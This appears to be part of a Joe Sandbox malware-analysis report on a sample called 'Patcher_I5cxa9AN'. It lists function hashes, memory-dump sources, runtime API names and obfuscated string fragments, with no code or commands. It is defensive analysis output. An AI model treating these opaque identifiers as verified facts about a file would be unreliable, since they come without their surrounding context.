                                                                                              • Instruction ID: b577297c32f7b8e64f4da9acef23e07e326f7f877f6de5147aeb4ed645232179
                                                                                              • Opcode Fuzzy Hash: 26016be9b063932f1adeefc85eacd714105cbf2bbac67ad15bcbeda117dabbb3
                                                                                              • Instruction Fuzzy Hash: 3C81AF757093218BC318DF18D890A2AB3B2FFC9718F25962CE9994B7A5DB31EC11C791
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 31aee1a45578be0b841ff586fb8bf5f06682acf528757158b8f35587a01e841f
                                                                                              • Instruction ID: f926a7609ebb16af3abe4e7ab0bc2ad80d4722358cbb67561d43644bb446d33d
                                                                                              • Opcode Fuzzy Hash: 31aee1a45578be0b841ff586fb8bf5f06682acf528757158b8f35587a01e841f
                                                                                              • Instruction Fuzzy Hash: 38816C73B047140BD308EF68CC8636BB6D79BC4318F1A953CE998DB390EA788D0986C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 77b3d196fc0520a9906e9c9e1b775ed8e1d99cea5c747a9aecc1823836507890
                                                                                              • Instruction ID: c44c5b9cd2685c14eab1d356c3f0a2d4ff609300d754172c683f2c3972173c08
                                                                                              • Opcode Fuzzy Hash: 77b3d196fc0520a9906e9c9e1b775ed8e1d99cea5c747a9aecc1823836507890
                                                                                              • Instruction Fuzzy Hash: 0D81D6747093259FC714AF18C881A6AB7F1EF89358F24962CF9998B7A1DB30E851CB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ea8a0218f61a053c75e34f850cf061b815b14b27e8fb9c5ccc1542af3cdeb7d5
                                                                                              • Instruction ID: ac61191bd48e1dec1e0efc926cb6b0052e2ce3eeb0ca6212d5786afe99b998a6
                                                                                              • Opcode Fuzzy Hash: ea8a0218f61a053c75e34f850cf061b815b14b27e8fb9c5ccc1542af3cdeb7d5
                                                                                              • Instruction Fuzzy Hash: CC61253779DA804BD3288D3C9C52259BAA34BD7334B3EC37EE9B4877E5D96548124381
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d325606468521016176bf1c9816ae8942cdb1c3810ec637c1dac51d9ef6bd10e
                                                                                              • Instruction ID: 6a3f2a40f76fbdcf2ec9bbce9e0ebdd3eab8dcccad3cc802bfcd1b318077227c
                                                                                              • Opcode Fuzzy Hash: d325606468521016176bf1c9816ae8942cdb1c3810ec637c1dac51d9ef6bd10e
                                                                                              • Instruction Fuzzy Hash: 8851E375A093209BD314DF248840B6BB7E3ABC5318F39D63EE868D7791EB31A805C781
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a3ea379766ce73dcc57ec8f1fe931432dfb41db3f577dce445276b44d9eed469
                                                                                              • Instruction ID: d5eaebd035731bf441ecddf020d6c5d3129a4291db800793e0cd1ad91387f2b6
                                                                                              • Opcode Fuzzy Hash: a3ea379766ce73dcc57ec8f1fe931432dfb41db3f577dce445276b44d9eed469
                                                                                              • Instruction Fuzzy Hash: AE4106B6A05320ABE7008E25DC40B7BB7B8BF8535CF25692CE48997650D771F809C7A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bb1a7e8f42284e6b104da1ebe5053b24f3440baae1755a287b2677c936cf610d
                                                                                              • Instruction ID: 63609dc4b33cc100c843d2f5cee02369f8e775dabb56a5b5e75b52c81c0e07b6
                                                                                              • Opcode Fuzzy Hash: bb1a7e8f42284e6b104da1ebe5053b24f3440baae1755a287b2677c936cf610d
                                                                                              • Instruction Fuzzy Hash: FB51E67265D3818FE310CF98CC8475BBBE2FBC5314F18893CE6915B692D7B998049B86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fd9b29f2cd5ccfdac04fdc224846b68024df9097edf50bcf3baf9e784fd48cfa
                                                                                              • Instruction ID: 58dbd50fed438f67fc5a8330da465e1bb1261e9c17f384b14f1ee47df673d3bc
                                                                                              • Opcode Fuzzy Hash: fd9b29f2cd5ccfdac04fdc224846b68024df9097edf50bcf3baf9e784fd48cfa
                                                                                              • Instruction Fuzzy Hash: 6A512EB06413008BEB64CF25C9A57523AB2FF65308F24959CC9490F3AAD7BAC41BCF84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3bb5377d88d60a491718665121c8ad2eaf8446d77a024166322fdcd642f3d079
                                                                                              • Instruction ID: 9f7fa1e3f72be2d89d131359915e7a2c346906f030d397dfe555da73f8307ae9
                                                                                              • Opcode Fuzzy Hash: 3bb5377d88d60a491718665121c8ad2eaf8446d77a024166322fdcd642f3d079
                                                                                              • Instruction Fuzzy Hash: 9B5123B0D003499FDF14CFA9D881B9DBBF5AB0A304F209129E818BB355DB749885CF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9d8ffb6c7b6cfc8d474a4026aaf4f9c19075f043df2a82a194633901dbcaa22c
                                                                                              • Instruction ID: 2368ab87c12fa0c10b13b49a319f262a924381749a210ada029cc829636a111f
                                                                                              • Opcode Fuzzy Hash: 9d8ffb6c7b6cfc8d474a4026aaf4f9c19075f043df2a82a194633901dbcaa22c
                                                                                              • Instruction Fuzzy Hash: 3D5102B0D003099FDF14DFA9D984B9DBBF5BB0A304F209129E818AB355DB749845CF45
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ad580863713cdedda6aa640036fa5e552871294dc1b92e8a181fa8cbeaeb4c83
                                                                                              • Instruction ID: e4ea8e77d1d213831c008e6ee2c4328d57dd357cf44b271ac1417981a24923e4
                                                                                              • Opcode Fuzzy Hash: ad580863713cdedda6aa640036fa5e552871294dc1b92e8a181fa8cbeaeb4c83
                                                                                              • Instruction Fuzzy Hash: A921F1753191A14BCB109F399CD026AB7A2EBC730576F42B6DAD0C3A63D522D817C660
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 815b448f9ba7a4a6133544a78cd4cdc7134c4088987c21d105fd1172496c5399
                                                                                              • Instruction ID: 4a2a571b24ae3657c61e9367beda0802e6b42a94378e83d7d981f7c78ee95200
                                                                                              • Opcode Fuzzy Hash: 815b448f9ba7a4a6133544a78cd4cdc7134c4088987c21d105fd1172496c5399
                                                                                              • Instruction Fuzzy Hash: 3B21CFB8A0A241AFDB04CF64DC40A7AB372FF9A39CF245628E05957A74D730E835D745
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a2a93f677eec45d643e526aed25977a85d75bd3b6b475d2535bb237f97c8ae1
                                                                                              • Instruction ID: 83bddb85c46dfa479a4898404e62185fe6545c4427631dfca5e3c365c00cdeed
                                                                                              • Opcode Fuzzy Hash: 5a2a93f677eec45d643e526aed25977a85d75bd3b6b475d2535bb237f97c8ae1
                                                                                              • Instruction Fuzzy Hash: 3B21A0B562D3D08BD314CF29845029BFBF6AFC2308F28895DE8E19BB55D675D8018783
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 18bc7857fc8e2fd27b0152409d2ca78916792fbbf8b345d67251d8359774c805
                                                                                              • Instruction ID: 84b88d9dc53c222e2e586fac07cfcd9634743751e8071cd8d41849bc1271d3be
                                                                                              • Opcode Fuzzy Hash: 18bc7857fc8e2fd27b0152409d2ca78916792fbbf8b345d67251d8359774c805
                                                                                              • Instruction Fuzzy Hash: A021053755C2A08BC314CF6898503ABBBF2AB93308F1E46AED9C167751D37AD805C781
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aaff1d69a656dd12b416b9d9bb0cd9e16bce7ede9119b36a4a0216e8d49aa57c
                                                                                              • Instruction ID: 45a77093a8494834d551a154b35947766e2af61f0963764e442a6f825f4bd5d1
                                                                                              • Opcode Fuzzy Hash: aaff1d69a656dd12b416b9d9bb0cd9e16bce7ede9119b36a4a0216e8d49aa57c
                                                                                              • Instruction Fuzzy Hash: 2E1151B8B01511ABD304CB25DC41A36B372FB9631CB749628D055D77A4EB34FC21C794
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d60ce0d1959124fef99cfb62ae57787f6fc1aff140539f394e03cbaea68f79bb
                                                                                              • Instruction ID: 7fd987d03f412477c065f6d1234dcb3cb58052e823a8040b4d188ad1be079ca7
                                                                                              • Opcode Fuzzy Hash: d60ce0d1959124fef99cfb62ae57787f6fc1aff140539f394e03cbaea68f79bb
                                                                                              • Instruction Fuzzy Hash: A21132715083908FDB36CF24C4947DFBBE0FB8A318F040A2CD9985B242D7755925CB8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4aa5e6a5bdd4afb90bbc3f4e7909301e33e1652ab87e3132901598b5b2e9eb2f
                                                                                              • Instruction ID: f8259e0ad6d5603a7645ec4f7f8274d80abfda4cdd6ac6d7abc121651dcf5537
                                                                                              • Opcode Fuzzy Hash: 4aa5e6a5bdd4afb90bbc3f4e7909301e33e1652ab87e3132901598b5b2e9eb2f
                                                                                              • Instruction Fuzzy Hash: C101D6B4B06501CBD7089F24BD11A3A7232FB4631CF345A38E6A103BE0FB306C2586C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a0c99de3eba24ee30e6af85775416a3ed46a957e9e642eabc0f4f871c0841d11
                                                                                              • Instruction ID: e3a9dc3b79c1d428704739527ccbe0222106c5c909a10732324c75bd733998b2
                                                                                              • Opcode Fuzzy Hash: a0c99de3eba24ee30e6af85775416a3ed46a957e9e642eabc0f4f871c0841d11
                                                                                              • Instruction Fuzzy Hash: DDF026B99052146BC2104A059C40D37B37DEBCE72CF20231AE41C926A1E722FD11C7A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 26e679e896a485a268c35eb22343a891f9e7d4b5731dcd6f3c9293c8b17d4903
                                                                                              • Instruction ID: 0649536d005ac82d0038c2b42aabc95d057fc81053351468c3f8f91273c9090a
                                                                                              • Opcode Fuzzy Hash: 26e679e896a485a268c35eb22343a891f9e7d4b5731dcd6f3c9293c8b17d4903
                                                                                              • Instruction Fuzzy Hash: 3BF02878909300DBD3108F14CC8077AB2B2B7CA314F306618F49883BA1DB30A821CB58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42e4ee1e7cdf287eceaa846c8393f2f46f98817670fa4b4e91e2c1917d380215
                                                                                              • Instruction ID: c8a22338268bf575a512d1889046ecbda1cdf68b40e0b020a54cac3878bc3c8c
                                                                                              • Opcode Fuzzy Hash: 42e4ee1e7cdf287eceaa846c8393f2f46f98817670fa4b4e91e2c1917d380215
                                                                                              • Instruction Fuzzy Hash: F7F027621492449B87040F5984E03A9B7A32987304B19D66DD0F8475FAC6A1C5478A98
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 44641c6012d227436016701ab0cbe60db6c6aff2245b51325b593a2783b023ac
                                                                                              • Instruction ID: c9d769c883bdc4d3866ec8d9996921ba3fed017eb60731f3e078d9a6710b7e0b
                                                                                              • Opcode Fuzzy Hash: 44641c6012d227436016701ab0cbe60db6c6aff2245b51325b593a2783b023ac
                                                                                              • Instruction Fuzzy Hash: 91E0AB3691C3608EC3009E3C940012FA3A3EBC3318F05AA7CC1D497B80C638C2068B99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ab6827daf5e30fd9c7f7dbcc78379a00d2117b79ed05a895f9f5770349d8fef
                                                                                              • Instruction ID: 29ecddea4e2e84ed177ddf0a26dd51ab98c0e6e2a993fe91d8df44fc8e692b6d
                                                                                              • Opcode Fuzzy Hash: 4ab6827daf5e30fd9c7f7dbcc78379a00d2117b79ed05a895f9f5770349d8fef
                                                                                              • Instruction Fuzzy Hash: F7F0F2B09197008BE7048F28C40475BBBF0AB86348F21A92CE5A49B264CB76D419CB86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 10f3dccc562e08723b83ecc80f076e71ac533726ffbf360d139fdbc8ca4b4fba
                                                                                              • Instruction ID: 0eb129394729a8ad354e55379fe48a5d8d9c487fb13a0c0056124facf0ad5caa
                                                                                              • Opcode Fuzzy Hash: 10f3dccc562e08723b83ecc80f076e71ac533726ffbf360d139fdbc8ca4b4fba
                                                                                              • Instruction Fuzzy Hash: BBD05E58F04180674418BA3D9D9BC377EBCD683204F84227CEC826B38AE500DC2987EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                              • Instruction ID: 711e4c1e007118a5cbdae88afc3de14cfab9f39c428a9b4816c8bc710a499d5d
                                                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                              • Instruction Fuzzy Hash: 03D0973050D7A00E97088C3810A043BFBF9E94305AB30208FE4E1E3504C220D81142A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 09e16e39bd158200689021e768aa96c2a469fb251d214a8ac074855538505001
                                                                                              • Instruction ID: a90e04103e20463bd89eb02745161b108c07718b9520ac731c1ad4bd8e60fa46
                                                                                              • Opcode Fuzzy Hash: 09e16e39bd158200689021e768aa96c2a469fb251d214a8ac074855538505001
                                                                                              • Instruction Fuzzy Hash: B6D0A928A01000274118AB3AED8BC377A7D8683208B042038E842D7391D8009C2982EE
                                                                                              APIs
                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6CDE94B6
                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 6CDE94D8
                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6CDE95E7
                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6CDE96B9
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6CDE973D
                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6CDE9758
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 2123188842-393685449
                                                                                              • Opcode ID: 63b4f42263378c26b2b59812ff0d242cfa2383ee622a8795dfdfc80806278b92
                                                                                              • Instruction ID: a88b5fc3b9f230878774d0329d8670a5fe48cf5c4e293de2a6eeaf1061533542
                                                                                              • Opcode Fuzzy Hash: 63b4f42263378c26b2b59812ff0d242cfa2383ee622a8795dfdfc80806278b92
                                                                                              • Instruction Fuzzy Hash: 76B16971C02209EFCF05DFA9D8809DEBBB5BF0C318B14465AE8156BA21D331EA55CFA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -$Y$\$e$f$h$k$m$x$z$}
                                                                                              • API String ID: 0-3917866455
                                                                                              • Opcode ID: f8bbf7211bb075a44fbf752906b5df6f74c9fd8ad20085152ced51eae8c46823
                                                                                              • Instruction ID: eb010635775a2e877934680e7ff0ca33fd1016f731b6953aa0acd2bce93b1937
                                                                                              • Opcode Fuzzy Hash: f8bbf7211bb075a44fbf752906b5df6f74c9fd8ad20085152ced51eae8c46823
                                                                                              • Instruction Fuzzy Hash: A641AD7164C7808EE300AFB8D88935FBEE19B82308F18897DE4D886792D77D8549C763
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &J2H$).D,$0z4x$2vEt$:r9p$;FD$T*Y($U&T$$`VwT$vNoL$~L|
                                                                                              • API String ID: 0-4239551822
                                                                                              • Opcode ID: fff0f1ab5ba63975767865b4a51af05757c8f4962c5a1291f747e31920f395b4
                                                                                              • Instruction ID: 65b2e4ae326bd4f2718a34066b2c4ca91b3e591885beec178e9ac0a8f9137ea6
                                                                                              • Opcode Fuzzy Hash: fff0f1ab5ba63975767865b4a51af05757c8f4962c5a1291f747e31920f395b4
                                                                                              • Instruction Fuzzy Hash: 8951CAB0146B44CEE335CF668591B93BAE0BB11704F508E1CC2FB6A664C7B5A056CF95
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &@7F$0DEZ$3L)B$F$\:$G8U>$O(Z.$T0P6$c<N2$z
                                                                                              • API String ID: 0-3798705922
                                                                                              • Opcode ID: 519a0880a837ff6766baf095d3bf4e1c22db58bcc1b081d877b8bab8baf9f24c
                                                                                              • Instruction ID: bf30d92c03cd3cde7995aec34b101a462adf5cfb223ca644e1531b8e1650e95c
